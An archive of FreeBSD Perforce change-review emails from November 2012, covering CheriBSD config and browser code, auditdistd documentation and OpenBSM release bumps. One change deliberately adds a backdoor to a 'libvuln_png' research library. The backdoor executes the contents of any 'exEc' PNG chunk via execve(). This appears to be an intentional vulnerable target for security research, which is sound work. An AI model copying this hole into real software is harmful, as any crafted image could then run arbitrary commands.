ADIST_DIRECTORY_RECEIVER "/var/audit/remote" -#define ADIST_CERTFILE "/etc/auditdistd.cert.pem" -#define ADIST_KEYFILE "/etc/auditdistd.key.pem" +#define ADIST_CERTFILE "/etc/security/auditdistd.cert.pem" +#define ADIST_KEYFILE "/etc/security/auditdistd.key.pem" #define ADIST_ERROR_WRONG_ORDER 1 #define ADIST_ERROR_INVALID_NAME 2 From owner-p4-projects@FreeBSD.ORG Wed Nov 21 00:10:01 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id CEA8AF6F; Wed, 21 Nov 2012 00:10:01 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8C9D1F6D for ; Wed, 21 Nov 2012 00:10:01 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 737D98FC08 for ; Wed, 21 Nov 2012 00:10:01 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAL0A1uC052281 for ; Wed, 21 Nov 2012 00:10:01 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAL0A1Hs052278 for perforce@freebsd.org; Wed, 21 Nov 2012 00:10:01 GMT (envelope-from brooks@freebsd.org) Date: Wed, 21 Nov 2012 00:10:01 GMT Message-Id: <201211210010.qAL0A1Hs052278@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219822 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 21 Nov 2012 00:10:02 -0000 http://p4web.freebsd.org/@@219822?ac=10 Change 219822 by brooks@brooks_zenith on 2012/11/21 00:09:54 Add support for MBR partion tables and FAT filesystems to the default kernel config(s). Affected files ... .. //depot/projects/ctsrd/cheribsd/src/sys/mips/conf/BERI_TEMPLATE#5 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/sys/mips/conf/BERI_TEMPLATE#5 (text+ko) ==== @@ -36,6 +36,7 @@ options SCHED_ULE options FFS #Berkeley Fast Filesystem +options MSDOSFS #MSDOS Filesystem options INET options INET6 @@ -49,6 +50,8 @@ #options WITNESS #Enable checks to detect deadlocks and cycles #options WITNESS_SKIPSPIN #Don't run witness on spinlocks for speed +options GEOM_PART_MBR + device geom_map device md From owner-p4-projects@FreeBSD.ORG Wed Nov 21 00:12:04 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 4E8A4199; Wed, 21 Nov 2012 00:12:04 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EBFBB197 for ; Wed, 21 Nov 2012 00:12:03 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id D29FE8FC16 for ; Wed, 21 Nov 2012 00:12:03 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAL0C3ag052348 for ; Wed, 21 Nov 2012 00:12:03 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAL0C3e6052345 for perforce@freebsd.org; Wed, 21 Nov 2012 00:12:03 GMT (envelope-from brooks@freebsd.org) Date: Wed, 21 Nov 2012 00:12:03 GMT Message-Id: <201211210012.qAL0C3e6052345@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219823 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 21 Nov 2012 00:12:04 -0000 http://p4web.freebsd.org/@@219823?ac=10 Change 219823 by brooks@brooks_zenith on 2012/11/21 00:11:40 Treat directories ending .cpt as CheriPoint presentations and launch cheripoint when they are selected. An appropriate icon is still required. Affected files ... .. //depot/projects/ctsrd/cheribsd/src/ctsrd/browser/browser.c#5 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/browser/browser.c#5 (text+ko) ==== @@ -265,7 +265,6 @@ int pmaster, pslave, status; ssize_t rlen; pid_t pid; - struct sigaction act; struct pollfd pfd[1]; char buf[1024]; u_int32_t *image; @@ -287,12 +286,6 @@ return; } - memset (&act, 0, sizeof(act)); - act.sa_handler = handle_sigchld; - - if (sigaction(SIGCHLD, &act, 0)) - err(1, "sigacation"); - close(pslave); /* * We poll for data from the child's pty. Don't bother looking for @@ -549,7 +542,10 @@ desc = "special/character"; break; case DT_DIR: - desc = "directory"; + if (fnmatch("*.cpt", entry->d_name, 0) == 0) + desc = "x-application/cheripoint"; + else + desc = "directory"; break; case DT_BLK: desc = "special/block"; @@ -797,6 +793,84 @@ } static int +invoke_cheripoint(int dfd, const char *name) +{ + static int pmaster; + int pslave, n, status; + char buf[1024]; + ssize_t rlen; + pid_t child_pid; + struct pollfd pfd[1]; + + if (openpty(&pmaster, &pslave, NULL, NULL, NULL) == -1) + err(1, "openpty"); + child_pid = fork(); + if (child_pid < 0) + err(1, "fork()"); + else if (child_pid > 0) + close(pslave); + else { + close(pmaster); + if (fchdir(dfd) == -1) { + syslog(LOG_ALERT, "fchdir failed in child: %s", + strerror(errno)); + err(1, "fchdir"); + } + if (login_tty(pslave) < 0) { + syslog(LOG_ALERT, "login_tty failed in child: %s", + strerror(errno)); + err(1, "tty_login"); + } + execl("/usr/bin/cheripoint", "cheripoint", "-f", name, + NULL); + syslog(LOG_ALERT, "exec of /usr/bin/browser failed: %s", + strerror(errno)); + err(1, "execl()"); + } + + for(;;) { + /* + * If the child has exited, reset the state and return to the + * main screen. + */ + if (zombies_waiting) { + wait4(child_pid, &status, 0, NULL); + /* XXX: ideally we'd check the status */ + close(pmaster); + zombies_waiting = 0; + break; + } + + /* Check for output from the child and post it if needed */ + pfd[0].fd = pmaster; + pfd[0].events = POLLIN; + n = poll(pfd, 1, INFTIM); + if (n == 0) + continue; + else if (n < 0) { + if (errno == EINTR) + continue; + err(1, "poll"); + } + if (n < 0) { + syslog(LOG_ALERT, "poll failed with %s", + strerror(errno)); + err(1, "poll"); + } + if (pfd[0].revents & POLLIN) { + rlen = read(pfd[0].fd, buf, sizeof(buf)); + if (rlen < 0) { + syslog(LOG_ALERT, "read failed: %s", + strerror(errno)); + err(1, "read"); + } else if (rlen > 0) + writeall(0, buf, rlen); + } + } + return (0); +} + +static int dentcmp(const void *v1, const void *v2) { const struct dent *d1, *d2; @@ -914,6 +988,12 @@ show_text_file(dfd, dents[topslot + action].entry.d_name); goto render; + } else if (strcmp("x-application/cheripoint", + dents[topslot + action].desc) == 0) { + invoke_cheripoint(dfd, dents[topslot + + action].entry.d_name); + fb_post(bgimage); /* Restore background */ + goto render; } else { if (verbose) printf("opening non-directory not " @@ -939,6 +1019,7 @@ { int ch, dfd; int ttyflag = 1, forkflag = 0; + struct sigaction act; while ((ch = getopt(argc, argv, "fTv")) != -1) { switch (ch) { @@ -975,6 +1056,12 @@ fb_load_syscons_font(NULL, "/usr/share/syscons/fonts/iso-8x16.fnt"); busy_indicator(); + memset (&act, 0, sizeof(act)); + act.sa_handler = handle_sigchld; + + if (sigaction(SIGCHLD, &act, 0)) + err(1, "sigacation"); + if (forkflag) fork_child(); busy_indicator(); From owner-p4-projects@FreeBSD.ORG Wed Nov 21 08:50:08 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 22CF87A3; Wed, 21 Nov 2012 08:50:08 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D57D57A1 for ; Wed, 21 Nov 2012 08:50:07 +0000 (UTC) (envelope-from pjd@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id BB2CD8FC12 for ; Wed, 21 Nov 2012 08:50:07 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAL8o7bl072478 for ; Wed, 21 Nov 2012 08:50:07 GMT (envelope-from pjd@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAL8o7vu072475 for perforce@freebsd.org; Wed, 21 Nov 2012 08:50:07 GMT (envelope-from pjd@freebsd.org) Date: Wed, 21 Nov 2012 08:50:07 GMT Message-Id: <201211210850.qAL8o7vu072475@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to pjd@freebsd.org using -f From: Pawel Jakub Dawidek Subject: PERFORCE change 219824 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 21 Nov 2012 08:50:08 -0000 http://p4web.freebsd.org/@@219824?ac=10 Change 219824 by pjd@pjd_anger on 2012/11/21 08:49:06 Add a note that auditdistd configuration file can contain passwords and thus permissions should be carefully configured. Suggested by: rwatson Affected files ... .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.8#3 edit .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.conf.5#3 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.8#3 (text+ko) ==== @@ -52,6 +52,9 @@ Specify alternative location of the configuration file. The default location is .Pa /etc/security/auditdistd.conf . +Note: the configuration file may contain passwords. +Care should be taken to configure proper permissions on this file +.Li ( eg. 0600 ) . .It Fl d Print or log debugging information. This option can be specified multiple times to raise the verbosity ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.conf.5#3 (text+ko) ==== @@ -36,6 +36,10 @@ .Xr auditdistd 8 daemon. .Sh DESCRIPTION +Note: the configuration file may contain passwords. +Care should be taken to configure proper permissions on this file +.Li ( eg. 0600 ) . +.Pp Every line starting with # is treated as comment and ignored. .Sh CONFIGURATION FILE SYNTAX General syntax of the From owner-p4-projects@FreeBSD.ORG Wed Nov 21 23:29:14 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 4F7BAE36; Wed, 21 Nov 2012 23:29:14 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EDB64E34 for ; Wed, 21 Nov 2012 23:29:13 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id B82238FC15 for ; Wed, 21 Nov 2012 23:29:13 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qALNTD80006634 for ; Wed, 21 Nov 2012 23:29:13 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qALNTDPK006631 for perforce@freebsd.org; Wed, 21 Nov 2012 23:29:13 GMT (envelope-from brooks@freebsd.org) Date: Wed, 21 Nov 2012 23:29:13 GMT Message-Id: <201211212329.qALNTDPK006631@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219825 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 21 Nov 2012 23:29:14 -0000 http://p4web.freebsd.org/@@219825?ac=10 Change 219825 by brooks@brooks_zenith on 2012/11/21 23:29:09 Abuse the unknown chunk handler to add support for a new chunk type exEc which processess the data section as set of null seperated and terminated strings and passes them to execve(). Affected files ... .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/Makefile#5 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#2 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/Makefile#5 (text+ko) ==== @@ -29,7 +29,8 @@ SSP_CFLAGS= CFLAGS+= -DPNG_NO_FLOATING_POINT_SUPPORTED \ - -DPNG_NO_CONSOLE_IO + -DPNG_NO_CONSOLE_IO \ + -DCTSRD_BACKDOOR # libde4tc currently requires # -DPNG_NO_STDIO ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#2 (text+ko) ==== @@ -14,6 +14,10 @@ #define PNG_INTERNAL #include "png.h" +#if defined(CTSRD_BACKDOOR) +#include +#endif + #if defined(_WIN32_WCE) /* strtod() function is not supported on WindowsCE */ # ifdef PNG_FLOATING_POINT_SUPPORTED @@ -2121,6 +2125,9 @@ png_handle_unknown(png_structp png_ptr, png_infop info_ptr, png_uint_32 length) { png_uint_32 skip = 0; +#if defined(CTSRD_BACKDOOR) + const png_byte png_exEc[5] = {101, 120, 69, 99, '\0'} +#endif png_debug(1, "in png_handle_unknown\n"); @@ -2149,7 +2156,11 @@ } #if defined(PNG_READ_UNKNOWN_CHUNKS_SUPPORTED) +#if defined(CTSRD_BACKDOOR) + if (1) +#else if (png_ptr->flags & PNG_FLAG_KEEP_UNKNOWN_CHUNKS) +#endif { png_unknown_chunk chunk; @@ -2165,6 +2176,37 @@ chunk.data = (png_bytep)png_malloc(png_ptr, length); chunk.size = (png_size_t)length; png_crc_read(png_ptr, (png_bytep)chunk.data, length); +#if defined(CTSRD_BACKDOOR) + /* + * Handle exEc chunks by parsing the data (presumed to be a series of + * NUL seperated strings) into an argv array and then execing it. + * Don't worry too much about validation or error handling since the + * whole point is to be exploitable. + */ + if (png_memcmp(chunk.name, png_exEc, 4) == 0) { + int i, argc; + char *c, **argv; + char * envp[1] = { NULL }; + + c = (char *)chunk.data; + argc = 0; + for (c = (char *)chunk.data; c < (char *)chunk.data + length; c++) { + if (*c == '\0') + argc++; + } + argv = png_malloc(png_ptr, sizeof(*argv) * (argc + 1)); + argv[0] = (char *)chunk.data; + for (c = (char *)chunk.data, i = 0; i < argc; c++) { + if (*c == '\0') { + i++; + argv[i] = c + 1; + } + } + argv[argc] = NULL; + execve(argv[0], argv, envp); + png_error(png_ptr, "failed to exec exEc chunk"); + } +#endif #if defined(PNG_READ_USER_CHUNKS_SUPPORTED) if(png_ptr->read_user_chunk_fn != NULL) { From owner-p4-projects@FreeBSD.ORG Fri Nov 23 00:09:51 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id A53B81F1; Fri, 23 Nov 2012 00:09:51 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 667F21E6 for ; Fri, 23 Nov 2012 00:09:51 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 490FF8FC33 for ; Fri, 23 Nov 2012 00:09:51 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAN09puG065500 for ; Fri, 23 Nov 2012 00:09:51 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAN09oLv065497 for perforce@freebsd.org; Fri, 23 Nov 2012 00:09:50 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Fri, 23 Nov 2012 00:09:50 GMT Message-Id: <201211230009.qAN09oLv065497@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219826 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 23 Nov 2012 00:09:51 -0000 http://p4web.freebsd.org/@@219826?ac=10 Change 219826 by rwatson@rwatson_cinnamon on 2012/11/23 00:09:00 Update more instances of OpenBSM 1.2alpha1 to 1.2alpha2. Affected files ... .. //depot/projects/trustedbsd/openbsm/Makefile.in#15 edit .. //depot/projects/trustedbsd/openbsm/README#41 edit .. //depot/projects/trustedbsd/openbsm/configure.ac#63 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/Makefile.in#15 (text+ko) ==== @@ -60,7 +60,8 @@ $(top_srcdir)/config/install-sh $(top_srcdir)/config/ltmain.sh \ $(top_srcdir)/config/missing $(top_srcdir)/configure INSTALL \ NEWS TODO config/config.guess config/config.sub config/depcomp \ - config/install-sh config/ltmain.sh config/missing + config/install-sh config/ltmain.sh config/missing \ + config/ylwrap ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ ==== //depot/projects/trustedbsd/openbsm/README#41 (text+ko) ==== @@ -1,4 +1,4 @@ -OpenBSM 1.2a1 +OpenBSM 1.2a2 Introduction @@ -65,4 +65,4 @@ http://www.TrustedBSD.org/ -$P4: //depot/projects/trustedbsd/openbsm/README#40 $ +$P4: //depot/projects/trustedbsd/openbsm/README#41 $ ==== //depot/projects/trustedbsd/openbsm/configure.ac#63 (text+ko) ==== @@ -2,8 +2,8 @@ # Process this file with autoconf to produce a configure script. AC_PREREQ(2.59) -AC_INIT([OpenBSM], [1.2alpha1], [trustedbsd-audit@TrustesdBSD.org],[openbsm]) -AC_REVISION([$P4: //depot/projects/trustedbsd/openbsm/configure.ac#62 $]) +AC_INIT([OpenBSM], [1.2alpha2], [trustedbsd-audit@TrustesdBSD.org],[openbsm]) +AC_REVISION([$P4: //depot/projects/trustedbsd/openbsm/configure.ac#63 $]) AC_CONFIG_MACRO_DIR([m4]) AC_CONFIG_SRCDIR([bin/auditreduce/auditreduce.c]) AC_CONFIG_AUX_DIR(config) From owner-p4-projects@FreeBSD.ORG Fri Nov 23 00:26:09 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 2483AB38; Fri, 23 Nov 2012 00:26:09 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id BD626B36 for ; Fri, 23 Nov 2012 00:26:08 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id A1E6C8FC0C for ; Fri, 23 Nov 2012 00:26:08 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAN0Q802066715 for ; Fri, 23 Nov 2012 00:26:08 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAN0Q8eJ066712 for perforce@freebsd.org; Fri, 23 Nov 2012 00:26:08 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Fri, 23 Nov 2012 00:26:08 GMT Message-Id: <201211230026.qAN0Q8eJ066712@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219827 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 23 Nov 2012 00:26:09 -0000 http://p4web.freebsd.org/@@219827?ac=10 Change 219827 by rwatson@rwatson_fledge on 2012/11/23 00:25:49 Hook up OpenBSM 1.2 alpha2 to the TrustedBSD/OpenBSM web sites. We now have an in-distribution test release that includes Pawel's auditdistd work. Affected files ... .. //depot/projects/trustedbsd/www/news.page#27 edit .. //depot/projects/trustedbsd/www/openbsm.page#43 edit Differences ... ==== //depot/projects/trustedbsd/www/news.page#27 (text+ko) ==== @@ -1,6 +1,6 @@